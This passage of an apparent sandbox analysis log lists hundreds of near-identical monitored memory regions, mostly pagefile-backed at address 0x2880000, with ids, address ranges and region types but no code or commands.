entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7869 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7870 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7871 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7872 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7873 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7874 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7875 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7876 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7877 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7878 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7879 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7880 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7881 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7882 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7883 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7884 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7885 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7886 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7887 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7888 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7889 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7890 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7891 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7892 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7893 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7894 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7895 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7896 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7897 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7898 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7899 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7900 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7901 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7902 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7903 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7904 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7905 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7906 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7907 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7908 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 7909 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 7910 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 7911 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7912 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7913 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7914 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7915 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7916 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7917 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7918 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7919 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7920 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7921 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7922 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7923 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7924 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7925 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7926 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7927 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7928 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7929 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7930 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7931 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7932 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7933 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7934 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7935 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7991 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7992 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7993 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 7996 start_va = 